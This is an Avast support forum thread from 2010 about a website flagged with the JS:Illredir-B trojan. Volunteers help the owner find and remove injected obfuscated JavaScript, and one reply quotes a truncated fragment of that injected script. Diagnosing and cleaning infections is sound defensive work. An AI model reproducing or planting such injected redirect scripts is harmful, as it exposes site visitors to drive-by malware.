Author Topic: Does any know anything about JS:Illredir-B[Trj]  (Read 19741 times)

0 Members and 1 Guest are viewing this topic.

chromenun

  • Guest
Does any know anything about JS:Illredir-B[Trj]
« on: January 07, 2010, 06:43:47 PM »
When I attempt to go to my website, Avast gives me a warning that it is infected with a Trojan Horse, and it says it is JS:Illredir-B[Trj]

I do not know if this is a real Trojan or a false positive.  Does anyone know anything about this problem?  And how do I fix it???

Thanks,
Lezlie

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #1 on: January 07, 2010, 07:11:44 PM »
Hi chromenum,

Can you give the address like hxtp or with wXw sothat we can see what is there.
More about this attack onto websites here:
http://www.wjunction.com/showthread.php?t=21715
and the subject also treated here:
http://forum.avast.com/index.php?topic=52476.0

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

chromenun

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #2 on: January 07, 2010, 07:28:28 PM »
I am sorry, I should have posted the URL for the site...
It is wXw.obebooks.com

And thanks, I will take a look at the links you provided...

« Last Edit: January 07, 2010, 07:59:38 PM by chromenun »

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88899
  • No support PMs thanks
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #3 on: January 07, 2010, 07:46:52 PM »
Is that the link to the alert as I have checked that out an no alert ?

Check the avast! Log Viewer (right click the avast 'a' icon), Warning section, this contains information on all avast detections. C:\Program Files\Alwil Software\Avast4\ashLogV.exe
 
- Or check the source file using notepad C:\Program Files\Alwil Software\Avast4\DATA\log\Warning.log and copy and paste the entry.
####
When posting URLs to suspect sites, change the http to hXXp so the link isn't active (clickable) avoiding accidental exposure.

However there is a rather strange looking script tag on the home page after the closing HTML tag, a bit of a standards no, no. So you could check out that and see if it should be there. Looks like it is trying to create an obfuscated scritp tag and that may be what the redirect is about, see image.
Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37506
  • Not a avast user
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #4 on: January 07, 2010, 07:57:04 PM »
This page seems to be <suspicious>
http://www.UnmaskParasites.com/security-report/?page=www.obebooks.com

and norton is blocking it also (HTTP Fragus Toolkit Download Activity)
« Last Edit: January 07, 2010, 07:58:44 PM by Pondus »

chromenun

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #5 on: January 07, 2010, 07:59:07 PM »
I am sorry, I didn't realize about the "live" link thingy...Now I understand...

I think my friend must be working on killing the virus/trojan because I just went there myself and I got no warning this time...

As soon as I hear from him, I will let ya'll know if he is taking care of it...

Thanks for trying to help!!!!

chromenun

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #6 on: January 07, 2010, 08:06:56 PM »
And, Pondus, thank you so much for the link about the online security place, unmaskparasites.com.  I was not aware of that site.

Thanks for all the help ya'll are giving me...


chromenun

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #7 on: January 07, 2010, 08:12:51 PM »
Ok, here is the log from Avast:

1/6/2010 6:16:42 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 6:17:21 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:26:52 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 6:26:52 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:27:09 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:50:07 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 6:50:07 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:50:30 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 10:10:46 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 10:10:53 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/7/2010 11:06:31 AM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/" file. 
1/7/2010 11:07:03 AM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "http://www.obebooks.com/" file. 

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33891
  • malware fighter
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #8 on: January 07, 2010, 08:23:36 PM »
Hi chromenun,

Suspiscious inline script
Code: [Select]
/*LGPL*/ try{ window.onload = function(){var Ilsyqujcs9bk8 = document.createElement('s^#^$c&#^!(r#^And here about the vulnerability of using that particular script with inline handlers:
http://cross-browser.com/talk/event_interface_soup.php

On the Fragus toolkit: http://www.finjan.com/Content.aspx?xmlid=500449&id=607  &
http://www.efblog.net/2009/08/fragus-new-botnet-framework-in-wild.html

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline DavidR

  • Avast Überevangelist
  • Certainly Bot
  • *****
  • Posts: 88899
  • No support PMs thanks
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #9 on: January 07, 2010, 09:17:40 PM »
Ok, here is the log from Avast:

1/6/2010 6:16:42 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 6:17:21 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:26:52 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/FCKeditor/editor/lang/fcklanguagemanager.js" file. 
1/6/2010 6:26:52 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
1/6/2010 6:27:09 PM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/FCKeditor/editor/js/fck_startup.js" file. 
<SNIP>
1/7/2010 11:07:03 AM   SYSTEM   476   Sign of "JS:Illredir-B [Trj]" has been found in "hXXp://www.obebooks.com/" file. 


OK, looks like there is a lot of work to do in cleaning these files as I suspect that they too may have been hacked.

You will also have to edit your list to break the links to suspect locations, like I have done in the quote above.

This looks like content management software possibly being exploited:
- This is commonly down to old content management software being vulnerable, PHP, Joomla, Wordpress, SQL, etc. etc. see this example of a HOSTs response to a hacked site.
Quote
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains.  We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

1. check all index pages for any signs of java script injected into their coding. On windows servers check any "default.aspx" or
"default.cfm" pages as those are popular targets too.

2. Remove any "rouge" files or php scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide
changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

3. Check all .htaccess files, as hackers like to load re-directs into them.

4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a
"strong" password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers efforts. In some cases you may still have coding which allows for injection. All user input fields hidden or not should be hard coded, filtered, and sanitized before being handed off to php or a database which will prevent coding characters from being submitted and run through your software.


Also see, Tips for Cleaning & Securing Your Website, http://www.stopbadware.org/home/security.

Windows 10 Home 64bit/ Acer Aspire F15/ Intel Core i5 7200U 2.5GHz, 8GB DDR4 memory, 256GB SSD, 1TB HDD/ avast! free 24.2.6105 (build 24.2.8918.824) UI 1.0.799/ Firefox, uBlock Origin, uMatrix/ MailWasher Pro/ Avast! Mobile Security

chromenun

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #10 on: January 09, 2010, 04:21:49 AM »
Ok, I just spent a good while going through a lot of my files on my website.  In most of the php files there is a weird code that looks a lot like this:

<script>/GNU GPL/try{window.onload=function} (and then a bunch of random type characters that go on for about 8 lines, and then ends with append.child, catch and then the end of script)

I was afraid to post the actual code here...anyway, is that the virus???  Do I just delete that code from each file that contains it??

Thanks,
Lezlie

spg SCOTT

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #11 on: January 09, 2010, 03:34:04 PM »
Wise choice not to post the script...could cause more problems than good...

I have checked, and that seems to be the code that is causing the alert from avast!

What you will need to do is as you said, delete it from all of the files that contain it, and also follow the instructions set out by DavidR to prevent re-infection.

-Scott-

trzykas

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #12 on: January 13, 2010, 10:39:26 AM »
hi

I got this virus on my server.

I write a simple script to remove this scram from all files.

here some one lost to remove this script from serwer so you can check how it's work

http://www.romania-virtuala.ro/remove-js-illredir-b.php

and here you got opinion about this script

http://www.zyenweb.com/2009/12/30/trojan-attack-jsillredir-b-trj/


and here is link for script

http://crafts.hopmart.pl/files/remove-js-illredir-b.php.tar.gz

enjoy



CharleyO

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #13 on: January 14, 2010, 10:43:02 AM »
***

Welcome to the forums,  trzykas.   :)

Thanks for posting information.


***

trzykas

  • Guest
Re: Does any know anything about JS:Illredir-B[Trj]
« Reply #14 on: January 14, 2010, 01:21:24 PM »
I actually upgrade the script to remove JS:Illredir-B and JS:Illredir-C in same time
If you got some other similar trojan on your website please contact me i try to help and upgrade the script.